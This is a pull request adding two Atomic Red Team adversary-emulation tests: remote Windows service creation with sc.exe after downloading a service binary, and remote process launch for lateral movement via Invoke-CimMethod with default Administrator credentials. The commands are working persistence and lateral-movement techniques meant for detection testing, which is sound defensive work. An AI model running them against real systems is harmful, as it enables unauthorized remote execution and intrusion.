### PR TITLE
Two Atomics and a Pear Tree

### DIFF
--- a/atomics/T1543.003/T1543.003.yaml
+++ b/atomics/T1543.003/T1543.003.yaml
@@ -128,3 +128,48 @@ atomic_tests:
       reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
     name: command_prompt
     elevation_required: true
+- name: Remote Service Installation CMD
+  description: |
+    Download an executable from github and start it as a service on a remote endpoint
+    Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+  supported_platforms:
+  - windows
+  input_arguments:
+    binary_path:
+      description: Name of the service binary, include path.
+      type: path
+      default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+    service_type:
+      description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+      type: String
+      default: Own
+    startup_type:
+      description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+      type: String
+      default: auto
+    service_name:
+      description: Name of the Service
+      type: string
+      default: AtomicTestService_CMD
+    remote_host:
+      description: Name of the remote endpoint
+      type: string
+      default: localhost
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Service binary must exist on disk at specified location (#{binary_path})
+    prereq_command: |
+      if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+      sc.exe \\#{remote_host} start #{service_name}
+    cleanup_command: |
+      sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+      sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1

--- a/atomics/T1546/T1546.yaml
+++ b/atomics/T1546/T1546.yaml
@@ -67,3 +67,57 @@ atomic_tests:
     cleanup_command: |-
       Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
     name: powershell
+
+- name: WMI Invoke-CimMethod Start Process
+  description: |
+    The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+    This is a novel way to perform lateral movement or to start a remote process.
+    This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+    A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dest:
+      description: destination computer name
+      type: string
+      default: localhost
+    password:
+      description: password for account
+      type: string
+      default: P@ssword1
+    username:
+      description: account to use
+      type: string
+      default: Administrator
+    process:
+      description: process to spawn
+      type: string
+      default: calc.exe
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+       # Set the remote computer name and credentials
+        $RemoteComputer = "#{dest}"
+        $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+
+        # Create a CIM session
+        $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential
+
+        # Define the process you want to start
+        $ProcessToStart = "#{process}"
+
+        # Invoke the Create method on the Win32_Process class to start the process
+        $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
+
+        # Check the result
+        if ($Result.ReturnValue -eq 0) {
+            Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
+        } else {
+            Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
+        }
+
+        # Clean up the CIM session
+        Remove-CimSession -CimSession $CimSession 
+


### PR DESCRIPTION
Simple "remote" service create. Confirmed works against a remote endpoint, but for Atomic shipped to localhost.
![image](https://user-images.githubusercontent.com/5632822/227034364-e03470d8-95a1-442d-891d-005569b8167a.png)


Invoke-CIMMethod
confirmed it works against a remote endpoint, but for Atomic shipped as localhost.
![image](https://user-images.githubusercontent.com/5632822/227034695-df2a3d6f-f84e-489a-b967-4836240ec26b.png)
